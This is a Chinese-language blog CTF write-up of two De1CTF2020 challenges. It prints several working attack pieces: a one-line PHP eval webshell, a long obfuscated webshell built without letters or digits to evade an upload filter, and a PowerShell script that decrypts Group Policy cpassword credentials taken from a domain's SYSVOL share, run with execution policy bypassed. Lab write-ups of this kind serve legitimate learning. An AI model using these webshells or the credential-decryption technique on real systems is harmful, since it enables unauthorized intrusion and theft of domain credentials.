User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 漏洞复现
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   CTFWP   ›   正文
CTFWP

De1CTF2020

2020-05-06 18:36:00
122  0 0

check in

考点:文件上传过滤ph,短标签命令执行绕过,.htaccess攻击

知识点:<?=和<? echo等价,从PHP5.4.0后起<?=总是可用的

<?=eval($_POST[‘cmd’]);相当于<? echo eval($_POST[‘cmd’]);

抓包,随便上传了个马,发现存在内容黑名单

过滤了ph,尝试用短标签绕过本地测试了下,这样的短标签可以执行任意系统命令,system也可以

于是我们去选择构造如下的payload上传,让他直接执行命令 ,其中注意.htaccess中的php部分用换行绕过,同时修改Content-Type类型

最后访问得到flag

如果要getshell可以蚁剑连接的话上传<?=eval($_POST[‘cmd’]);

Hard_Pentest_1

考点: 短标签+无字母数字webshell+内网渗透

打开题目的源码如下:

<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="submit">
</form>

</body>
</html>

代码过滤很简单:不允许php后缀,且文件内容不能存在数字和字母,php大小写就绕过了,无数字字母的webshell构造参看https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

<?=$_=[]?>
<?=$_=@"$_"?>
<?=$_=$_['!'=='@']?>
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?>
<?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$____='_'?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?= $_=$$____?>
<?= $_[__]($_[_],$_[___])?>

上面这个脚本请仔细研究,很好理解。最后访问得到的路径去写一个马

蚁剑连接后发现是Windows环境,找到一个压缩包,导出,发现需要密码

根据提示继续进行内网渗透,查到域控192.168.0.12,该机器为192.168.0.11并属于De1CTF2020.lab域中

输入net use查看域中的共享连接

接下来参看大佬的Writeup学习到域渗透中SYSVOL还原组策略中保存的密码方法

参看:https://3gstudent.github.io/3gstudent.github.io

首先在每个域内都有一个共享的文件夹SYSVOL,路径为:\\<donain>\SYSVOL\,所有域内主机都能访问,里面保存组策略相关数据。因此进入该域中的共享文件夹

然后需要找到相应的策略组id的配置文件,路径为://De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/,如下是配置文件Groups.xml的内容

其中cpassword为AES加密的密码,有现成的解密脚本,改一下密码即可

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param(
        [string]$Cpassword
    )
    try{
    # Append appropriate padding based on string Length
    $Mod=($Cpassword.length % 4)
    
    switch($Mod){
    '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length-1)}
    '2' {$Cpassword += ('='*(4-$Mod))}
    '3' {$Cpassword += ('='*(4-$Mod))}
    }
    
    $Base64Decoded=[Convert]::FromBase64String($Cpassword)
    #Create a new AES.NET Crypto Object
    $AesObject=New-Object System.Security.Cryptography.AesCryptoServiceProvider
    [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    
    #Set IV to all nulls to prevent dynamic generation of IV value
    $AesIV = New-Object Byte[]($Aesobject.IV.Length)
    $AesObject.IV=$AesIV
    $AesObject.Key=$Aeskey
    $DecryptorObject=$Aesobject.CreateDecryptor()
    [Byte[]] $OutBlock=$DecryptorObject.TransformFinalBlock($Base64Decoded,0,$Base64Decoded.length)
    
    return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    
    catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"//对应密文

保存为1.ps1上传,在虚拟终端运行:powershell -executionpolicy bypass -file 1.ps1,得到压缩包密码,打开得到flag1

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • 免杀QuasarRAT
  • 密码保护:python反序列化免杀上线CS
  • Hgame2021
  • Shiro反序列化漏洞复现
  • 密码保护:2020祥云杯决赛AWD赛题复盘
近期评论
    文章归档
    • 2021年2月
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 漏洞复现
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 条目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    167 文章 0 评论 34706 浏览
    测试
    测试